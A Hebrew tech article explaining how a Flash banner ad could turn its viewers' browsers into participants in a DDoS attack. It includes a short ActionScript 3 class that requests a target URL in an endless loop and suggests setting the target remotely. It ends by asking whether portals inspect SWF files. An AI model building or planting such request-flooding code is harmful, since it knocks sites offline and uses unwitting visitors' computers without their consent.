כניסה למערכת מאמרים

               אין חשבון עדיין?

אינטרנט ומחשבים

התקפת DDoS באמצעות פלאש

  • PDF
דירוג משתמש: / 0
גרועהכי טוב 

התקפת DDoS (Distributed Denial of Service) הינה התקפה המבוצעת ע"י מספר גדול של גורמים (לדוגמא: מחשבים שונים באינטרנט) על גורם מסויים אחד (לדוגמא: אתר אינטרנט).
מטרת התקיפה היא לגרום להשבתת פעילות הגורם (לדוגמא: מניעה מאתר מסויים לתת שירות לגולשיו), בהמשך אפרט איך ניתן מקובץ פלאש בלתי-מזיק לכאורה ליצור התקפה מאסיבית על אתרי אינטרנט.
התקפות DDoS מבוצעות ע"י ניצול המשאבים של הגורם המותקף כך שמשאביו של הגורם המותקף לא יהיו פנויים עבור משתמשים רגילים, לדוגמא כשהדפדפן מבקש עמוד מסויים מאתר אינטרנט, השרת בו נמצא האתר מעבד את הבקשה ולאחר מכן שולח את העמוד לגולש אשר ביקש אותו. במידה והשרת יקבל כמות פניות אדירה, רכיבי החומרה והתוכנה שבו לא יוכלו לעמוד בעומס ופשוט יקרסו, זוהי תוצאה של התקפת DoS או DDoS, בעל האתר יכול להתקין הגנות בין מי שמנסה להתקיף את האתר לבין השרת בו מותקן האתר, כגון: רכיבי חומרה או תוכנה שיודעים לזהות התקפות, לעמוד בעומס כבד ולסנן את הבקשות הזדוניות לפני שהן מגיעות לאתר.

באפליקציית פלאש (קובץ SWF) אפשר לבצע קריאות לכתובת אינטרנט בפרוטוקול http ע"י שימוש במחלקה URLRequest.
ע"י קריאות חוזרות ונישנות למחלקה זו אפשר לטעון עמודי אינטרנט של אתר מסויים שוב ושוב. פעולה זו ממחשב אחד לא תגרום לקריסת האתר ולא תפגע בביצועיו, אבל מה יקרה אם קוד זה יהיה קיים בתוך באנר פלאש שמוצג בפורטל גדול ?
כל הגולשים שייראו את הבאנר, יהפכו להיות כלים בהתקפת DDoS ללא ידיעתם.

קוד לדוגמא בשפת אקשן-סקריפט 3
package
{
import flash.display.*;
import flash.events.*;
import flash.net.*;

public class DDoS extends MovieClip
{
public var Url:String = "http://www.website.com"; 
public var UrlLoader:URLLoader = new URLLoader();

public function DDoS() 
{
UrlLoader.addEventListener(Event.COMPLETE, Loop);

Loop();
}

private function Loop(e:Event=null):void
{
UrlLoader.load(new URLRequest(Url));
}}}

אם כתובת האתר המותקף (מוגדרת במשתנה Url) תיטען באופן דינאמי מכתובת באינטרנט אז יהיה אפשר לשנות את כתובת האתר המותקף מרחוק ללא שינוי בקובץ ה-SWF.

האם הפורטלים הגדולים בודקים את הקוד של קבצי ה-SWF המוצגים לגולשים ?
האם יש כלי אוטומטי שבודק קבצי SWF ומחפש קוד עויין ? (רעיון לסטארט אפ)
 




עוד כתבות :

» שלבים בפיתוח משחק פלאש

שלב ראשון: איפיוןתהליך הפיתוח מתחיל בשלב האיפיון, בשלב זה נכתב מסמך ע"י הלקוח או ע"י , המכיל את הפונקציונאליות הדרושה וגם את שירטוטי החלונות השונים. ככל שהאיפיון יהיה מפורט יותר ולא יהיו בו חלקים חסרים, כך משך הזמן שיידרש לשלבי העבודה הבאים יהיה קצר יותר והמשחק יהיה בנוי בצורה טובה יותר שתאפשר לבצע עידכונים בעתיד בפשטות.שלב שני: עיצובבשלב זה המעצב מכין את...

» הכנת רובוט למשחק הדו-פרצופי בערוץ 2

בכל יום שישי בערב, יגאל שילון מנחה משחק טלוויזיוני בשם: . במשחק מוצגת תמונה של פרצוף המורכב מפרצופם של שני מפורסמים, משתתף עולה לשידור ובמידה וגילה מיהם שני המפורסמים - זוכה במכונית. ביום שישי האחרון שני המפורסמים היו: בוני גינצבורג ובר רפאלי. כדי להשתתף במשחק הטלוויזיוני צריך לשחק במשחק האינטרנטי באתר המשחקים של מאקו ולצבור את הניקוד הגבוה ביותר בכל השבוע....

» הכנת זחלן-רשת (Web Spider) בפלאש

מהו זחלן-רשת?זחלן-רשת הוא תוכנת מחשב שסורקת אתרי-אינטרנט בזה אחר זה ומבצעת פעולות המבוססות על התוכן הנמצא בדפי-האתרים. המעבר של זחלן-הרשת מאתר לאתר מבוצע ע"י זיהוי הקישורים החיצוניים (קישורים לאתרים אחרים) שנמצאים באתר הנוכחי שנסרק. לדוגמא, זחלן-הרשת מתחיל מכתובת של אתר אינטרנט ומבצע את הפעולות הבאות: קבלת קוד ה-HTML של העמוד הראשי באתר, ניתוח קוד ה-HTML, שליפת...

» זכיה במשחק 'על כל הקופה' באמצעות ניצול של חור אבטחה

המשחק 'על כל הקופה' הוא עם מעל ל-300,000 משתמשים. מטרת המשחק היא לענות נכונה על מספר השאלות הגבוה ביותר, ברגע ששחקן טועה, המשחק נגמר. במידה והשחקן בוחר בתשובה הנכונה הוא מתקדם לשאלה הבאה, לכל שאלה מופיעות מספר תשובות כאשר רק אחת מהן נכונה (בדומה לשעשועון הטריוויה ''). למשחק יש שתי גירסאות: גירסא בה משחקים בשביל כיף וגירסא בה משחקים בשביל כסף אמיתי. בגירסת הכסף...

» פרוטוקולי-רשת בפלאש

מהו פרוטוקול?פרוטוקול הוא הגדרה של רצף אירועים המתרחשים בזה אחר זה כדי לבצע פעולות מסויימות. לדוגמא: כדי ששיחת טלפון תתקיים, צד אחד צריך לחייג והצד השני לענות. רק לאחר מכן שני הצדדים יוכלו לדבר בינהם. דוגמא אחרת לפרוטוקול-רשת באינטרנט: הפרוטוקול FTP (File Transfer Protocol) מגדיר איך קובץ יכול להישלח ממחשב אחד לאחר. הפרוטוקול מגדיר איך הקשר הראשוני נוצר, שמות הפקודות...

» מבוא לפיתוח משחקים מרובי-משתתפים

למה לפתח משחק מרובה-משתתפים?משחקים מרובי-משתתפים מורכבים יותר להכנה מאשר משחקים לשחקן אחד. בדרך כלל הסיכוי של משחק עם האפשרות לשחק נגד שחקנים אמיתים להצליח הוא גבוה יותר. לדוגמא: משחק  בפייסבוק אשר פותח ע"י חברת זינגה העוסקת בתחום  - לא היה מגיע למימדי הצלחה כאלו אם השחקנים האחרים לא היו אמיתיים. לפעמים אפשר להוסיף למשחק של שחקן אחד את האפשרות לשחק...

» זיהוי רובוטים במשחקים מרובי-משתתפים

מהו משחק מרובה-משתתפים?משחק מרובה-משתתפים (הנכתב ע"י  למשל) הוא כל משחק בו משתתף יותר משחקן אחד בו-זמנית (לדוגמא: , שש בש ובינגו).אפשר לחלק משחקים מרובי-משתתפים לשתי קבוצות: הקבוצה הראשונה מכילה משחקים בהם משתתפים שני שחקנים בלבד (לדוגמא: שחמט, שש בש ודמקה) והקבוצה השנייה מכילה משחקים בהם משתתפת קבוצת שחקנים (לדוגמא: פוקר ובינגו). במשחקים מרובי-משתתפים כל...

» פלטפורמה למשחקים של שני שחקנים

למה להשתמש בפלטפורמה?בשנתיים האחרונות פיתחתי פלטפורמה למשחקים של שני שחקנים עם משחק אחד לדוגמא (שפועל על גבי הפלטפורמה) - .היתרון בפיתוח פלטפורמה הוא שכעת ניתן לפתח משחקים אחרים בהם שני שחקנים משחקים אחד נגד השני (לדוגמא: שחמט ודמקה), ללא פיתוח מחדש של כל המערכת, אלא רק החלק הספיציפי של המשחק. כל יתר החלקים (כגון: ממשק הניהול, לובי, טורנירים וכדומה) נשארים...

» צפייה מרחוק בזמן-אמת במשתמשי אפליקציית פלאש

כשמפתחים אפליקציית (ע"י העסקת ) אפשר להוסיף את האפשרות שכל פעולה שהמשתמש מבצע באפליקציה תישלח למחשב אחר ובמחשב האחר הפעולה שהמשתמש ביצע תוצג. אפשר לבצע זאת בשתי דרכים שונות:האפשרות הראשונה היא לכתוב קוד שהוא ספיציפי לאפליקציה, לדוגמא כשהמשתמש מבצע פעולה מסויימת באפליקציה כמו לפתוח חלון חדש, תישלח למחשב אחר הודעה שהמשתמש פתח חלון חדש ואז המחשב האחר...

» בדיקת תהליך השידרוג האוטומטי של נגן הפלאש

כל מותאמת לפעול בגירסא מסויימת של נגן הפלאש, קיימות גירסאות שונות לנגן הפלאש כאשר האחרונה מבינהן בעת כתיבת מאמר זה הינה גירסא מספר 10.1, נגן הפלאש מותקן במחשב באמצעות התקנה ידנית מהאתר של אדובי או באמצעות אפליקצית פלאש שמופיעה באתר מסויים, במידה והגולש צופה בדף אינטרנט בו קיימת אפליקצית או משחק פלאש ולא מותקן במחשב נגן הפלאש, אז תופיע הודעה אשר תשאל את...